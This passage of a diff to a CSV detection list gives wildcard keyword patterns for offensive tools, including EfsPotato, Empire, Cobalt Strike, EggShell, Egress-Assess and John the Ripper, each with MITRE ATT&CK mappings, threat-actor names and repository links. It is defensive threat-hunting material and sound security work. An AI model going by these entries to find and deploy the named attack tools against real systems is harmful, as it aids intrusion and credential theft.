backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*EfsPotato-*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*EfsPotato*efsrpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" "*EfsPotato*lsarpc*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" 
@@ -9780,7 +9929,7 @@
 "*EfsPotato*samr*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z"
 "*EfsPotato-main*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z"
 "*EgeBalci/amber@latest*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*EggShell.py*","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","10","1562","404","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z"
+"*EggShell.py*","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","10","1563","404","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z"
 "*Egress-Assess Exfil Data*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email subject","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*Egress-Assess Report*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*Egress-Assess transfer share*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
@@ -9789,20 +9938,20 @@
 "*EgressAssess.ps1*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*Egress-Assess-master*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*egressbuster*","offensive_tool_keyword","egressbuster","EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. Most companies have special exceptions and allow ports but they may be difficult to find.","T1046 - T1570 - T1590","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/trustedsec/egressbuster","1","1","N/A","N/A","4","327","104","2021-02-17T00:54:07Z","2015-05-14T02:19:26Z"
-"*egresscheck-framework*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*ejabberd2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*egresscheck-framework*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*ejabberd2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*eldraco/domain_analyzer*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z"
-"*electrum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*electrum2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*elevate juicypotato *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
 "*elevate Printspoofer*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","0","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z"
 "*elevate svc-exe *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
-"*ElevatePrivs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*elevationstation.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
-"*elevationstation.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
-"*elevationstation.git*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
-"*elevationstation.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
-"*elevationstation-main*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
-"*ElevenPaths*FOCA*","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","10","2495","519","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z"
+"*ElevatePrivs*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*elevationstation.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*elevationstation.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*elevationstation.git*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*elevationstation.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*elevationstation-main*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*ElevenPaths*FOCA*","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","10","2495","518","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z"
 "*ELFLoader.c*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z"
 "*ELFLoader.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z"
 "*ELFLoader.out*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z"
@@ -9815,7 +9964,7 @@ "*EmbedInHTML-master*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*empire AttackServers*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 